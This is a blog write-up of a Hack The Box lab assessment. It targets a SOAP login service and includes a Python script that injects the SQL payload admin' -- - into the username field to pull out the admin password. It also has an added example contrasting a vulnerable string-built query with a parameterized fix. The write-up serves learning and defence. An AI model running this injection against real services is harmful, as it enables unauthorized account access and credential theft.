Hack The Box Skills Assessment - Web Service and API Attacks

Jun Takemura · March 10, 2025

Skills Assessment

Task

Our client tasks us with assessing a SOAP web service whose WSDL file resides at http://<TARGET IP>:3002/wsdl?wsdl.

Assess the target, identify an SQL Injection vulnerability through SOAP messages and answer the question below.

Submit the password of the user that has a username of “admin”. Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error.

Attempt

First, let’s just fetch the WSDL file:

curl -s "http://10.129.254.109:3002/wsdl?wsdl"

It has a LoginRequest element:

<s:element name="LoginRequest">
  <s:complexType>
    <s:sequence>
      <s:element minOccurs="1" maxOccurs="1" name="username" type="s:string"/>
      <s:element minOccurs="1" maxOccurs="1" name="password" type="s:string"/>
    </s:sequence>
  </s:complexType>
</s:element>

I actually thought of SOAPAction spoofing to use ExecuteCommand’s parameter (cmd) at first, but since the task specifies it’s SQLi related, I focused on this.

Python exploit:

import requests

# SQLi payload for <username>: closes the string literal and comments out the rest of the query
payload = "admin' -- -"
# LoginRequest envelope matching the WSDL, with the payload placed in <username>
data = f'<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:tns="http://tempuri.org/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <soap:Body> <LoginRequest xmlns="http://tempuri.org/"> <username>{payload}</username> <password>pass</password> </LoginRequest> </soap:Body> </soap:Envelope>'

# POST the envelope with the Login SOAPAction and print the raw response
print(requests.post("http://10.129.254.109:3002/wsdl", data=data, headers={"SOAPAction":'"Login"'}).content)

Saved as soap_sqli.py and ran it. Done.
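
Why that payload works, and the fix, as an added example (not code from the target service or from this post's original text). The users table, the query shape, the sample flag value and all function names are assumptions; the real service's backend is not shown here.

```python
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"soap": "http://schemas.xmlsoap.org/soap/envelope/", "t": "http://tempuri.org/"}

def make_db():
    """In-memory stand-in for the backend; schema and row are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'FLAG{constructed-sample}')")
    return db

def build_envelope(username, password="pass"):
    """Same LoginRequest shape as the request in the post."""
    return ('<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
            '<soap:Body><LoginRequest xmlns="http://tempuri.org/">'
            f"<username>{escape(username)}</username>"
            f"<password>{escape(password)}</password>"
            "</LoginRequest></soap:Body></soap:Envelope>")

def parse_login(envelope):
    """Pull username and password out of the SOAP body."""
    req = ET.fromstring(envelope).find("soap:Body/t:LoginRequest", NS)
    return (req.findtext("t:username", namespaces=NS),
            req.findtext("t:password", namespaces=NS))

def login_vulnerable(db, envelope):
    user, pw = parse_login(envelope)
    # Assumed bug: SOAP field values are pasted into the SQL text, so a
    # quote in <username> ends the literal and "--" drops the password check.
    sql = ("SELECT username, password FROM users "
           f"WHERE username = '{user}' AND password = '{pw}'")
    return db.execute(sql).fetchone()

def login_hardened(db, envelope):
    user, pw = parse_login(envelope)
    # Bound parameters: the driver treats both values as data, never as SQL.
    # The response also no longer returns the stored password.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone()

if __name__ == "__main__":
    db = make_db()
    env = build_envelope("admin' -- -")
    print("vulnerable:", login_vulnerable(db, env))  # row returned without the password
    print("hardened:  ", login_hardened(db, env))    # no match
```

XML parsing is not a sanitization step: the SOAP layer hands the quote through untouched, so the query itself has to be parameterized.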
